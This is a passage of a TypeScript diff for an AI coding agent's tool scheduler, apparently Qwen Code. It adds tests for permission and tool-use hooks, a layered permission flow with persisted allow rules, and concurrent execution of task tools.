firePreToolUseHook( + mockMessageBus as unknown as MessageBus, + 'testTool', + { param: 'value' }, + 'toolu_test', + 'full', + ); + + expect(result.shouldProceed).toBe(true); + expect(mockMessageBus.request).toHaveBeenCalledWith( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'PreToolUse', + input: { + permission_mode: 'full', + tool_name: 'testTool', + tool_input: { param: 'value' }, + tool_use_id: 'toolu_test', + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + }); + + it('should block tool execution when hook denies', async () => { + const { firePreToolUseHook } = await import('./toolHookTriggers.js'); + + const mockResponse: HookExecutionResponse = { + type: MessageBusType.HOOK_EXECUTION_RESPONSE, + correlationId: 'test-correlation-id', + success: true, + output: { + decision: 'deny', + reason: 'Not allowed', + }, + }; + + mockMessageBus.request.mockResolvedValue(mockResponse); + + const result = await firePreToolUseHook( + mockMessageBus as unknown as MessageBus, + 'testTool', + { param: 'value' }, + 'toolu_test', + 'full', + ); + + expect(result.shouldProceed).toBe(false); + expect(result.blockReason).toBe('Not allowed'); + }); + + it('should return shouldProceed: true when no message bus is provided', async () => { + const { firePreToolUseHook } = await import('./toolHookTriggers.js'); + + const result = await firePreToolUseHook( + undefined, + 'testTool', + { param: 'value' }, + 'toolu_test', + 'full', + ); + + expect(result.shouldProceed).toBe(true); + }); + + it('should return shouldProceed: true when hook request fails', async () => { + const { firePreToolUseHook } = await import('./toolHookTriggers.js'); + + mockMessageBus.request.mockRejectedValue(new Error('Network error')); + + const result = await firePreToolUseHook( + mockMessageBus as unknown as MessageBus, + 'testTool', + { param: 'value' }, + 'toolu_test', + 'full', + ); + + expect(result.shouldProceed).toBe(true); + }); + }); + + describe('firePostToolUseHook', () => { 
+ it('should return shouldStop: false when hook permits', async () => { + const { firePostToolUseHook } = await import('./toolHookTriggers.js'); + + const mockResponse: HookExecutionResponse = { + type: MessageBusType.HOOK_EXECUTION_RESPONSE, + correlationId: 'test-correlation-id', + success: true, + output: { + permission_decision: 'proceed', + }, + }; + + mockMessageBus.request.mockResolvedValue(mockResponse); + + const result = await firePostToolUseHook( + mockMessageBus as unknown as MessageBus, + 'testTool', + { param: 'value' }, + { response: 'result' }, + 'toolu_test', + 'full', + ); + + expect(result.shouldStop).toBe(false); + }); + + it('should return shouldStop: true when hook indicates stop', async () => { + const { firePostToolUseHook } = await import('./toolHookTriggers.js'); + + const mockResponse: HookExecutionResponse = { + type: MessageBusType.HOOK_EXECUTION_RESPONSE, + correlationId: 'test-correlation-id', + success: true, + output: { + decision: 'allow', + continue: false, + stopReason: 'Completed', + }, + }; + + mockMessageBus.request.mockResolvedValue(mockResponse); + + const result = await firePostToolUseHook( + mockMessageBus as unknown as MessageBus, + 'testTool', + { param: 'value' }, + { response: 'result' }, + 'toolu_test', + 'full', + ); + + expect(result.shouldStop).toBe(true); + expect(result.stopReason).toBe('Completed'); + }); + + it('should return shouldStop: false when no message bus is provided', async () => { + const { firePostToolUseHook } = await import('./toolHookTriggers.js'); + + const result = await firePostToolUseHook( + undefined, + 'testTool', + { param: 'value' }, + { response: 'result' }, + 'toolu_test', + 'full', + ); + + expect(result.shouldStop).toBe(false); + }); + }); + + describe('firePostToolUseFailureHook', () => { + it('should return additional context when hook provides it', async () => { + const { firePostToolUseFailureHook } = await import( + './toolHookTriggers.js' + ); + + const mockResponse: 
HookExecutionResponse = { + type: MessageBusType.HOOK_EXECUTION_RESPONSE, + correlationId: 'test-correlation-id', + success: true, + output: { + hookSpecificOutput: { + additionalContext: 'Additional error context', + }, + }, + }; + + mockMessageBus.request.mockResolvedValue(mockResponse); + + const result = await firePostToolUseFailureHook( + mockMessageBus as unknown as MessageBus, + 'toolu_test', + 'testTool', + { param: 'value' }, + 'Error occurred', + false, + 'full', + ); + + expect(result.additionalContext).toBe('Additional error context'); + }); + + it('should return empty object when no message bus is provided', async () => { + const { firePostToolUseFailureHook } = await import( + './toolHookTriggers.js' + ); + + const result = await firePostToolUseFailureHook( + undefined, + 'toolu_test', + 'testTool', + { param: 'value' }, + 'Error occurred', + false, + 'full', + ); + + expect(result).toEqual({}); + }); + }); + + describe('fireNotificationHook', () => { + it('should send notification to message bus', async () => { + const { fireNotificationHook } = await import('./toolHookTriggers.js'); + + const mockResponse: HookExecutionResponse = { + type: MessageBusType.HOOK_EXECUTION_RESPONSE, + correlationId: 'test-correlation-id', + success: true, + output: { + hookSpecificOutput: { + additionalContext: 'Notification processed', + }, + }, + }; + + mockMessageBus.request.mockResolvedValue(mockResponse); + + const result = await fireNotificationHook( + mockMessageBus as unknown as MessageBus, + 'Test message', + 'info' as NotificationType, + 'Test Title', + ); + + expect(result.additionalContext).toBe('Notification processed'); + expect(mockMessageBus.request).toHaveBeenCalledWith( + { + type: MessageBusType.HOOK_EXECUTION_REQUEST, + eventName: 'Notification', + input: { + message: 'Test message', + notification_type: 'info', + title: 'Test Title', + }, + }, + MessageBusType.HOOK_EXECUTION_RESPONSE, + ); + }); + + it('should return empty object when no message bus 
is provided', async () => { + const { fireNotificationHook } = await import('./toolHookTriggers.js'); + + const result = await fireNotificationHook( + undefined, + 'Test message', + 'info' as NotificationType, + 'Test Title', + ); + + expect(result).toEqual({}); + }); + }); + + describe('firePermissionRequestHook', () => { + it('should return hasDecision: false when hook makes no decision', async () => { + const { firePermissionRequestHook } = await import( + './toolHookTriggers.js' + ); + + const mockResponse: HookExecutionResponse = { + type: MessageBusType.HOOK_EXECUTION_RESPONSE, + correlationId: 'test-correlation-id', + success: true, + output: { + decision: null, + }, + }; + + mockMessageBus.request.mockResolvedValue(mockResponse); + + const result = await firePermissionRequestHook( + mockMessageBus as unknown as MessageBus, + 'testTool', + { param: 'value' }, + 'full', + ); + + expect(result.hasDecision).toBe(false); + }); + + it('should return hasDecision: true with allow decision when hook allows', async () => { + const { firePermissionRequestHook } = await import( + './toolHookTriggers.js' + ); + + const mockResponse: HookExecutionResponse = { + type: MessageBusType.HOOK_EXECUTION_RESPONSE, + correlationId: 'test-correlation-id', + success: true, + output: { + hookSpecificOutput: { + decision: { + behavior: 'allow', + updatedInput: { param: 'modified_value' }, + }, + }, + }, + }; + + mockMessageBus.request.mockResolvedValue(mockResponse); + + const result = await firePermissionRequestHook( + mockMessageBus as unknown as MessageBus, + 'testTool', + { param: 'value' }, + 'full', + ); + + expect(result.hasDecision).toBe(true); + expect(result.shouldAllow).toBe(true); + expect(result.updatedInput).toEqual({ param: 'modified_value' }); + }); + + it('should return hasDecision: true with deny decision when hook denies', async () => { + const { firePermissionRequestHook } = await import( + './toolHookTriggers.js' + ); + + const mockResponse: HookExecutionResponse 
= { + type: MessageBusType.HOOK_EXECUTION_RESPONSE, + correlationId: 'test-correlation-id', + success: true, + output: { + hookSpecificOutput: { + decision: { + behavior: 'deny', + message: 'Access denied', + interrupt: true, + }, + }, + }, + }; + + mockMessageBus.request.mockResolvedValue(mockResponse); + + const result = await firePermissionRequestHook( + mockMessageBus as unknown as MessageBus, + 'testTool', + { param: 'value' }, + 'full', + ); + + expect(result.hasDecision).toBe(true); + expect(result.shouldAllow).toBe(false); + expect(result.denyMessage).toBe('Access denied'); + expect(result.shouldInterrupt).toBe(true); + }); + + it('should return hasDecision: false when no message bus is provided', async () => { + const { firePermissionRequestHook } = await import( + './toolHookTriggers.js' + ); + + const result = await firePermissionRequestHook( + undefined, + 'testTool', + { param: 'value' }, + 'full', + ); + + expect(result.hasDecision).toBe(false); + }); + }); + + describe('Concurrent task tool execution', () => { + function createScheduler( + tools: Map, + onAllToolCallsComplete: Mock, + onToolCallsUpdate: Mock, + ) { + const mockToolRegistry = { + getTool: (name: string) => tools.get(name), + getFunctionDeclarations: () => [], + tools, + discovery: {}, + registerTool: () => {}, + getToolByName: (name: string) => tools.get(name), + getToolByDisplayName: () => undefined, + getTools: () => [...tools.values()], + discoverTools: async () => {}, + getAllTools: () => [...tools.values()], + getToolsByServer: () => [], + } as unknown as ToolRegistry; + + const mockConfig = { + getSessionId: () => 'test-session-id', + getUsageStatisticsEnabled: () => true, + getDebugMode: () => false, + getApprovalMode: () => ApprovalMode.AUTO_EDIT, + getAllowedTools: () => [], + getContentGeneratorConfig: () => ({ + model: 'test-model', + authType: 'gemini', + }), + getShellExecutionConfig: () => ({ + terminalWidth: 90, + terminalHeight: 30, + }), + storage: { + 
getProjectTempDir: () => '/tmp', + }, + getTruncateToolOutputThreshold: () => + DEFAULT_TRUNCATE_TOOL_OUTPUT_THRESHOLD, + getTruncateToolOutputLines: () => DEFAULT_TRUNCATE_TOOL_OUTPUT_LINES, + getToolRegistry: () => mockToolRegistry, + getUseModelRouter: () => false, + getGeminiClient: () => null, + getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), + } as unknown as Config; + + return new CoreToolScheduler({ + config: mockConfig, + onAllToolCallsComplete, + onToolCallsUpdate, + getPreferredEditor: () => 'vscode', + onEditorClose: vi.fn(), + }); + } + + it('should execute multiple task tools concurrently', async () => { + const executionLog: string[] = []; + + const taskTool = new MockTool({ + name: 'task', + execute: async (params) => { + const id = (params as { id: string }).id; + executionLog.push(`start:${id}`); + // Simulate async work — concurrent tasks will interleave here + await new Promise((r) => setTimeout(r, 50)); + executionLog.push(`end:${id}`); + return { + llmContent: `Task ${id} done`, + returnDisplay: `Task ${id} done`, + }; + }, + }); + + const tools = new Map([['task', taskTool]]); + const onAllToolCallsComplete = vi.fn(); + const onToolCallsUpdate = vi.fn(); + const scheduler = createScheduler( + tools, + onAllToolCallsComplete, + onToolCallsUpdate, + ); + + const abortController = new AbortController(); + const requests = [ + { + callId: '1', + name: 'task', + args: { id: 'A' }, + isClientInitiated: false, + prompt_id: 'p1', + }, + { + callId: '2', + name: 'task', + args: { id: 'B' }, + isClientInitiated: false, + prompt_id: 'p1', + }, + { + callId: '3', + name: 'task', + args: { id: 'C' }, + isClientInitiated: false, + prompt_id: 'p1', + }, + ]; + + await scheduler.schedule(requests, abortController.signal); + + // All tasks should have completed + expect(onAllToolCallsComplete).toHaveBeenCalled(); + const completedCalls = 
onAllToolCallsComplete.mock + .calls[0][0] as ToolCall[]; + expect(completedCalls).toHaveLength(3); + expect(completedCalls.every((c) => c.status === 'success')).toBe(true); + + // Verify concurrency: all tasks should start before any finishes + // With sequential execution, the log would be [start:A, end:A, start:B, end:B, ...] + // With concurrent execution, all starts happen before any end + const startIndices = executionLog + .filter((e) => e.startsWith('start:')) + .map((e) => executionLog.indexOf(e)); + const firstEnd = executionLog.findIndex((e) => e.startsWith('end:')); + expect(startIndices.every((i) => i < firstEnd)).toBe(true); + }); + + it('should run task tools concurrently while other tools run sequentially', async () => { + const executionLog: string[] = []; + + const taskTool = new MockTool({ + name: 'task', + execute: async (params) => { + const id = (params as { id: string }).id; + executionLog.push(`task:start:${id}`); + await new Promise((r) => setTimeout(r, 50)); + executionLog.push(`task:end:${id}`); + return { + llmContent: `Task ${id} done`, + returnDisplay: `Task ${id} done`, + }; + }, + }); + + const readTool = new MockTool({ + name: 'read_file', + execute: async (params) => { + const id = (params as { id: string }).id; + executionLog.push(`read:start:${id}`); + await new Promise((r) => setTimeout(r, 20)); + executionLog.push(`read:end:${id}`); + return { + llmContent: `Read ${id} done`, + returnDisplay: `Read ${id} done`, + }; + }, + }); + + const tools = new Map([ + ['task', taskTool], + ['read_file', readTool], + ]); + const onAllToolCallsComplete = vi.fn(); + const onToolCallsUpdate = vi.fn(); + const scheduler = createScheduler( + tools, + onAllToolCallsComplete, + onToolCallsUpdate, + ); + + const abortController = new AbortController(); + const requests = [ + { + callId: '1', + name: 'read_file', + args: { id: '1' }, + isClientInitiated: false, + prompt_id: 'p1', + }, + { + callId: '2', + name: 'task', + args: { id: 'A' }, + 
isClientInitiated: false, + prompt_id: 'p1', + }, + { + callId: '3', + name: 'read_file', + args: { id: '2' }, + isClientInitiated: false, + prompt_id: 'p1', + }, + { + callId: '4', + name: 'task', + args: { id: 'B' }, + isClientInitiated: false, + prompt_id: 'p1', + }, + ]; + + await scheduler.schedule(requests, abortController.signal); + + expect(onAllToolCallsComplete).toHaveBeenCalled(); + const completedCalls = onAllToolCallsComplete.mock + .calls[0][0] as ToolCall[]; + expect(completedCalls).toHaveLength(4); + expect(completedCalls.every((c) => c.status === 'success')).toBe(true); + + // Non-task tools should execute sequentially: read:1 finishes before read:2 starts + const read1End = executionLog.indexOf('read:end:1'); + const read2Start = executionLog.indexOf('read:start:2'); + expect(read1End).toBeLessThan(read2Start); + + // Task tools should execute concurrently: both start before either ends + const taskAStart = executionLog.indexOf('task:start:A'); + const taskBStart = executionLog.indexOf('task:start:B'); + const firstTaskEnd = Math.min( + executionLog.indexOf('task:end:A'), + executionLog.indexOf('task:end:B'), + ); + expect(taskAStart).toBeLessThan(firstTaskEnd); + expect(taskBStart).toBeLessThan(firstTaskEnd); + }); + }); +}); diff --git a/packages/core/src/core/coreToolScheduler.ts b/packages/core/src/core/coreToolScheduler.ts index a4f50066e..7cc5c9099 100644 --- a/packages/core/src/core/coreToolScheduler.ts +++ b/packages/core/src/core/coreToolScheduler.ts @@ -19,18 +19,25 @@ import type { ChatRecordingService, } from '../index.js'; import { createDebugLogger } from '../utils/debugLogger.js'; +import { + generateToolUseId, + firePreToolUseHook, + firePostToolUseHook, + firePostToolUseFailureHook, + fireNotificationHook, + firePermissionRequestHook, + appendAdditionalContext, +} from './toolHookTriggers.js'; +import { NotificationType } from '../hooks/types.js'; +import type { MessageBus } from '../confirmation-bus/message-bus.js'; const 
debugLogger = createDebugLogger('TOOL_SCHEDULER'); import { ToolConfirmationOutcome, ApprovalMode, logToolCall, - ReadFileTool, ToolErrorType, ToolCallEvent, - ShellTool, - logToolOutputTruncated, - ToolOutputTruncatedEvent, InputFormat, Kind, SkillTool, @@ -42,6 +49,7 @@ import type { PartListUnion, } from '@google/genai'; import { ToolNames } from '../tools/tool-names.js'; +import { buildPermissionRules } from '../permissions/rule-parser.js'; import { getResponseTextFromParts } from '../utils/generateContentResponseUtilities.js'; import type { ModifyContext } from '../tools/modifiable-tool.js'; import { @@ -49,9 +57,7 @@ import { modifyWithEditor, } from '../tools/modifiable-tool.js'; import * as Diff from 'diff'; -import * as fs from 'node:fs/promises'; import * as path from 'node:path'; -import { doesToolInvocationMatch } from '../utils/tool-utils.js'; import levenshtein from 'fast-levenshtein'; import { getPlanModeSystemReminder } from './prompts.js'; import { ShellToolInvocation } from '../tools/shell.js'; @@ -306,67 +312,6 @@ const createErrorResponse = ( contentLength: error.message.length, }); -export async function truncateAndSaveToFile( - content: string, - callId: string, - projectTempDir: string, - threshold: number, - truncateLines: number, -): Promise<{ content: string; outputFile?: string }> { - if (content.length <= threshold) { - return { content }; - } - - let lines = content.split('\n'); - let fileContent = content; - - // If the content is long but has few lines, wrap it to enable line-based truncation. - if (lines.length <= truncateLines) { - const wrapWidth = 120; // A reasonable width for wrapping. 
- const wrappedLines: string[] = []; - for (const line of lines) { - if (line.length > wrapWidth) { - for (let i = 0; i < line.length; i += wrapWidth) { - wrappedLines.push(line.substring(i, i + wrapWidth)); - } - } else { - wrappedLines.push(line); - } - } - lines = wrappedLines; - fileContent = lines.join('\n'); - } - - const head = Math.floor(truncateLines / 5); - const beginning = lines.slice(0, head); - const end = lines.slice(-(truncateLines - head)); - const truncatedContent = - beginning.join('\n') + '\n... [CONTENT TRUNCATED] ...\n' + end.join('\n'); - - // Sanitize callId to prevent path traversal. - const safeFileName = `${path.basename(callId)}.output`; - const outputFile = path.join(projectTempDir, safeFileName); - try { - await fs.writeFile(outputFile, fileContent); - - return { - content: `Tool output was too large and has been truncated. -The full output has been saved to: ${outputFile} -To read the complete output, use the ${ReadFileTool.Name} tool with the absolute file path above. -The truncated output below shows the beginning and end of the content. The marker '... [CONTENT TRUNCATED] ...' indicates where content was removed. -This allows you to efficiently examine different parts of the output without loading the entire file. 
-Truncated part of the output: -${truncatedContent}`, - outputFile, - }; - } catch (_error) { - return { - content: - truncatedContent + `\n[Note: Could not save full output to file]`, - }; - } -} - interface CoreToolSchedulerOptions { config: Config; outputUpdateHandler?: OutputUpdateHandler; @@ -509,6 +454,7 @@ export class CoreToolScheduler { : undefined; // Preserve diff for cancelled edit operations + // Preserve plan content for cancelled plan operations let resultDisplay: ToolResultDisplay | undefined = undefined; if (currentCall.status === 'awaiting_approval') { const waitingCall = currentCall as WaitingToolCall; @@ -520,6 +466,13 @@ export class CoreToolScheduler { waitingCall.confirmationDetails.originalContent, newContent: waitingCall.confirmationDetails.newContent, }; + } else if (waitingCall.confirmationDetails.type === 'plan') { + resultDisplay = { + type: 'plan_summary', + message: 'Plan was rejected. Remaining in plan mode.', + plan: waitingCall.confirmationDetails.plan, + rejected: true, + }; } } else if (currentCall.status === 'executing') { // If the tool was streaming live output, preserve the latest @@ -746,27 +699,44 @@ export class CoreToolScheduler { (reqInfo): ToolCall => { // Check if the tool is excluded due to permissions/environment restrictions // This check should happen before registry lookup to provide a clear permission error - const excludeTools = this.config.getExcludeTools?.() ?? 
undefined; - if (excludeTools && excludeTools.length > 0) { - const normalizedToolName = reqInfo.name.toLowerCase().trim(); - const excludedMatch = excludeTools.find( - (excludedTool) => - excludedTool.toLowerCase().trim() === normalizedToolName, - ); + const pm = this.config.getPermissionManager?.(); + if (pm && !pm.isToolEnabled(reqInfo.name)) { + const permissionErrorMessage = `Qwen Code requires permission to use "${reqInfo.name}", but that permission was declined.`; + return { + status: 'error', + request: reqInfo, + response: createErrorResponse( + reqInfo, + new Error(permissionErrorMessage), + ToolErrorType.EXECUTION_DENIED, + ), + durationMs: 0, + }; + } - if (excludedMatch) { - // The tool exists but is excluded - return permission error directly - const permissionErrorMessage = `Qwen Code requires permission to use ${excludedMatch}, but that permission was declined.`; - return { - status: 'error', - request: reqInfo, - response: createErrorResponse( - reqInfo, - new Error(permissionErrorMessage), - ToolErrorType.EXECUTION_DENIED, - ), - durationMs: 0, - }; + // Legacy fallback: check getPermissionsDeny() when PM is not available + if (!pm) { + const excludeTools = + this.config.getPermissionsDeny?.() ?? 
undefined; + if (excludeTools && excludeTools.length > 0) { + const normalizedToolName = reqInfo.name.toLowerCase().trim(); + const excludedMatch = excludeTools.find( + (excludedTool) => + excludedTool.toLowerCase().trim() === normalizedToolName, + ); + if (excludedMatch) { + const permissionErrorMessage = `Qwen Code requires permission to use ${excludedMatch}, but that permission was declined.`; + return { + status: 'error', + request: reqInfo, + response: createErrorResponse( + reqInfo, + new Error(permissionErrorMessage), + ToolErrorType.EXECUTION_DENIED, + ), + durationMs: 0, + }; + } } } @@ -856,10 +826,86 @@ export class CoreToolScheduler { continue; } - const confirmationDetails = - await invocation.shouldConfirmExecute(signal); + // ================================================================= + // L3→L4→L5 Permission Flow + // ================================================================= - if (!confirmationDetails) { + // ---- L3: Tool's default permission ---- + const defaultPermission: string = + await invocation.getDefaultPermission(); + + // ---- L4: PermissionManager override (if relevant rules exist) ---- + const pm = this.config.getPermissionManager?.(); + let finalPermission = defaultPermission; + let pmForcedAsk = false; + + // Build invocation context from tool params. + // This is used both by the PM evaluation below and later by + // centralized permission-rule generation (Always Allow). + const toolParams = invocation.params as Record; + const shellCommand = + 'command' in toolParams ? String(toolParams['command']) : undefined; + // Extract file path — tools use 'absolute_path', 'file_path', + // or 'path' (LS / grep / glob). + let invocationFilePath = + typeof toolParams['absolute_path'] === 'string' + ? toolParams['absolute_path'] + : typeof toolParams['file_path'] === 'string' + ? 
toolParams['file_path'] + : undefined; + if ( + invocationFilePath === undefined && + typeof toolParams['path'] === 'string' + ) { + // LS uses absolute paths; grep/glob may be relative to targetDir. + invocationFilePath = path.isAbsolute(toolParams['path']) + ? toolParams['path'] + : path.resolve(this.config.getTargetDir(), toolParams['path']); + } + let invocationDomain: string | undefined; + if (typeof toolParams['url'] === 'string') { + try { + invocationDomain = new URL(toolParams['url']).hostname; + } catch { + // malformed URL — leave domain undefined + } + } + // Generic specifier for literal matching (Skill name, Task subagent type, etc.) + const literalSpecifier = + typeof toolParams['skill'] === 'string' + ? toolParams['skill'] + : typeof toolParams['subagent_type'] === 'string' + ? toolParams['subagent_type'] + : undefined; + const pmCtx = { + toolName: reqInfo.name, + command: shellCommand, + filePath: invocationFilePath, + domain: invocationDomain, + specifier: literalSpecifier, + }; + + if (pm && defaultPermission !== 'deny') { + if (pm.hasRelevantRules(pmCtx)) { + const pmDecision = pm.evaluate(pmCtx); + if (pmDecision !== 'default') { + finalPermission = pmDecision; + // If PM explicitly forces 'ask', adding allow rules won't help + // because ask has higher priority. Hide "Always allow" options. 
+ if (pmDecision === 'ask') { + pmForcedAsk = true; + } + } + } + } + + // ---- L5: Final decision based on permission + ApprovalMode ---- + const approvalMode = this.config.getApprovalMode(); + const isPlanMode = approvalMode === ApprovalMode.PLAN; + const isExitPlanModeTool = reqInfo.name === 'exit_plan_mode'; + + if (finalPermission === 'allow') { + // Auto-approve: tool is inherently safe (read-only) or PM allows this.setToolCallOutcome( reqInfo.callId, ToolConfirmationOutcome.ProceedAlways, @@ -868,54 +914,89 @@ export class CoreToolScheduler { continue; } - const allowedTools = this.config.getAllowedTools() || []; - const isPlanMode = - this.config.getApprovalMode() === ApprovalMode.PLAN; - const isExitPlanModeTool = reqInfo.name === 'exit_plan_mode'; + if (finalPermission === 'deny') { + // Hard deny: security violation or PM explicit deny + const denyMessage = + defaultPermission === 'deny' + ? `Tool "${reqInfo.name}" is denied: command substitution is not allowed for security reasons.` + : `Tool "${reqInfo.name}" is denied by permission rules.`; + this.setStatusInternal( + reqInfo.callId, + 'error', + createErrorResponse( + reqInfo, + new Error(denyMessage), + ToolErrorType.EXECUTION_DENIED, + ), + ); + continue; + } - // ask_user_question needs the confirmation flow even in plan mode - // so the user can actually answer the questions + // finalPermission === 'ask' (or 'default' from PM → treat as ask) + // apply ApprovalMode overrides. + // ask_user_question always needs confirmation so the user can answer; + // it must bypass both YOLO auto-approve and plan-mode blocking. 
const isAskUserQuestionTool = - confirmationDetails && - confirmationDetails.type === 'ask_user_question'; + reqInfo.name === ToolNames.ASK_USER_QUESTION; - if (isPlanMode && !isExitPlanModeTool && !isAskUserQuestionTool) { - if (confirmationDetails) { - this.setStatusInternal(reqInfo.callId, 'error', { - callId: reqInfo.callId, - responseParts: convertToFunctionResponse( - reqInfo.name, - reqInfo.callId, - getPlanModeSystemReminder(), - ), - resultDisplay: 'Plan mode blocked a non-read-only tool call.', - error: undefined, - errorType: undefined, - }); - } else { - this.setStatusInternal(reqInfo.callId, 'scheduled'); - } - } else if ( - (this.config.getApprovalMode() === ApprovalMode.YOLO || - doesToolInvocationMatch( - toolCall.tool, - invocation, - allowedTools, - )) && - // Even in YOLO mode, ask_user_question tool requires user confirmation to ensure the user always has a chance to respond to questions - confirmationDetails.type !== 'ask_user_question' - ) { + if (approvalMode === ApprovalMode.YOLO && !isAskUserQuestionTool) { this.setToolCallOutcome( reqInfo.callId, ToolConfirmationOutcome.ProceedAlways, ); this.setStatusInternal(reqInfo.callId, 'scheduled'); + } else if ( + isPlanMode && + !isExitPlanModeTool && + !isAskUserQuestionTool + ) { + this.setStatusInternal(reqInfo.callId, 'error', { + callId: reqInfo.callId, + responseParts: convertToFunctionResponse( + reqInfo.name, + reqInfo.callId, + getPlanModeSystemReminder(), + ), + resultDisplay: 'Plan mode blocked a non-read-only tool call.', + error: undefined, + errorType: undefined, + }); } else { + // Get confirmation details from the tool + const confirmationDetails = + await invocation.getConfirmationDetails(signal); + + // ── Centralised rule injection ────────────────────────────────── + // If the tool did not provide its own permissionRules (e.g. 
Shell + // and WebFetch already do), generate minimum-scope rules from + // the invocation context so that "Always Allow" persists a + // properly scoped rule rather than nothing. + // Only exec/mcp/info types support the permissionRules field. + if ( + (confirmationDetails.type === 'exec' || + confirmationDetails.type === 'mcp' || + confirmationDetails.type === 'info') && + !confirmationDetails.permissionRules + ) { + confirmationDetails.permissionRules = buildPermissionRules(pmCtx); + } + + // AUTO_EDIT mode: auto-approve edit-like and info tools + if ( + approvalMode === ApprovalMode.AUTO_EDIT && + (confirmationDetails.type === 'edit' || + confirmationDetails.type === 'info') + ) { + this.setToolCallOutcome( + reqInfo.callId, + ToolConfirmationOutcome.ProceedAlways, + ); + this.setStatusInternal(reqInfo.callId, 'scheduled'); + continue; + } + /** - * In non-interactive mode where no user will respond to approval prompts, - * and not running as IDE companion or Zed integration, automatically deny approval. - * This is intended to create an explicit denial of the tool call, - * rather than silently waiting for approval and hanging forever. + * In non-interactive mode, automatically deny. */ const shouldAutoDeny = !this.config.isInteractive() && @@ -960,9 +1041,78 @@ export class CoreToolScheduler { }); } + // Fire PermissionRequest hook before showing the permission dialog. 
+ const messageBus = this.config.getMessageBus() as + | MessageBus + | undefined; + const hooksEnabled = this.config.getEnableHooks(); + + if (hooksEnabled && messageBus) { + const permissionMode = String(this.config.getApprovalMode()); + const hookResult = await firePermissionRequestHook( + messageBus, + reqInfo.name, + (reqInfo.args as Record) || {}, + permissionMode, + ); + + if (hookResult.hasDecision) { + if (hookResult.shouldAllow) { + // Hook granted permission - apply updated input if provided and proceed + if ( + hookResult.updatedInput && + typeof reqInfo.args === 'object' + ) { + this.setArgsInternal( + reqInfo.callId, + hookResult.updatedInput, + ); + } + await confirmationDetails.onConfirm( + ToolConfirmationOutcome.ProceedOnce, + ); + this.setToolCallOutcome( + reqInfo.callId, + ToolConfirmationOutcome.ProceedOnce, + ); + this.setStatusInternal(reqInfo.callId, 'scheduled'); + } else { + // Hook denied permission - cancel with optional message + const cancelPayload = hookResult.denyMessage + ? { cancelMessage: hookResult.denyMessage } + : undefined; + await confirmationDetails.onConfirm( + ToolConfirmationOutcome.Cancel, + cancelPayload, + ); + this.setToolCallOutcome( + reqInfo.callId, + ToolConfirmationOutcome.Cancel, + ); + this.setStatusInternal( + reqInfo.callId, + 'error', + createErrorResponse( + reqInfo, + new Error( + hookResult.denyMessage || + `Permission denied by hook for "${reqInfo.name}"`, + ), + ToolErrorType.EXECUTION_DENIED, + ), + ); + } + continue; + } + } + const originalOnConfirm = confirmationDetails.onConfirm; const wrappedConfirmationDetails: ToolCallConfirmationDetails = { ...confirmationDetails, + // When PM has an explicit 'ask' rule, 'always allow' would be + // ineffective because ask takes priority over allow. + // Hide the option so users aren't misled. + ...(pmForcedAsk ? 
{ hideAlwaysAllow: true } : {}), onConfirm: ( outcome: ToolConfirmationOutcome, payload?: ToolConfirmationPayload, @@ -980,6 +1130,20 @@ export class CoreToolScheduler { 'awaiting_approval', wrappedConfirmationDetails, ); + + // Fire permission_prompt notification hook + if (hooksEnabled && messageBus) { + fireNotificationHook( + messageBus, + `Qwen Code needs your permission to use ${reqInfo.name}`, + NotificationType.PermissionPrompt, + 'Permission needed', + ).catch((error) => { + debugLogger.warn( + `Permission prompt notification hook failed: ${error instanceof Error ? error.message : String(error)}`, + ); + }); + } } } catch (error) { if (signal.aborted) { @@ -1025,7 +1189,43 @@ export class CoreToolScheduler { await originalOnConfirm(outcome, payload); - if (outcome === ToolConfirmationOutcome.ProceedAlways) { + if ( + outcome === ToolConfirmationOutcome.ProceedAlways || + outcome === ToolConfirmationOutcome.ProceedAlwaysProject || + outcome === ToolConfirmationOutcome.ProceedAlwaysUser + ) { + // Persist permission rules for Project/User scope outcomes + if ( + outcome === ToolConfirmationOutcome.ProceedAlwaysProject || + outcome === ToolConfirmationOutcome.ProceedAlwaysUser + ) { + const scope = + outcome === ToolConfirmationOutcome.ProceedAlwaysProject + ? 'project' + : 'user'; + // Read permissionRules from the stored confirmation details first, + // falling back to payload for backward compatibility. + const details = (toolCall as WaitingToolCall | undefined) + ?.confirmationDetails; + const detailsRules = (details as Record | undefined)?.[ + 'permissionRules' + ] as string[] | undefined; + const payloadRules = payload?.permissionRules; + const rules = payloadRules ?? detailsRules ?? []; + const persistFn = this.config.getOnPersistPermissionRule?.(); + const pm = this.config.getPermissionManager?.(); + if (rules.length > 0) { + for (const rule of rules) { + // 1. 
Persist to disk (settings.json) + if (persistFn) { + await persistFn(scope, 'allow', rule); + } + // 2. Immediately update in-memory PermissionManager so the + // new rule takes effect without restart. + pm?.addPersistentRule(rule, 'allow'); + } + } + } await this.autoApproveCompatiblePendingTools(signal, callId); } @@ -1140,9 +1340,28 @@ export class CoreToolScheduler { (call) => call.status === 'scheduled', ); - for (const toolCall of callsToExecute) { - await this.executeSingleToolCall(toolCall, signal); - } + // Task tools are safe to run concurrently — they spawn independent + // sub-agents with no shared mutable state. All other tools run + // sequentially in their original order to preserve any implicit + // ordering the model may rely on. + const taskCalls = callsToExecute.filter( + (call) => call.request.name === ToolNames.TASK, + ); + const otherCalls = callsToExecute.filter( + (call) => call.request.name !== ToolNames.TASK, + ); + + const taskPromise = Promise.all( + taskCalls.map((tc) => this.executeSingleToolCall(tc, signal)), + ); + + const othersPromise = (async () => { + for (const toolCall of otherCalls) { + await this.executeSingleToolCall(toolCall, signal); + } + })(); + + await Promise.all([taskPromise, othersPromise]); } } @@ -1155,6 +1374,41 @@ export class CoreToolScheduler { const scheduledCall = toolCall; const { callId, name: toolName } = scheduledCall.request; const invocation = scheduledCall.invocation; + const toolInput = scheduledCall.request.args as Record; + + // Generate unique tool_use_id for hook tracking + const toolUseId = generateToolUseId(); + + // Get MessageBus for hook execution + const messageBus = this.config.getMessageBus() as MessageBus | undefined; + const hooksEnabled = this.config.getEnableHooks(); + + // PreToolUse Hook + if (hooksEnabled && messageBus) { + // Convert ApprovalMode to permission_mode string for hooks + const permissionMode = this.config.getApprovalMode(); + const preHookResult = await 
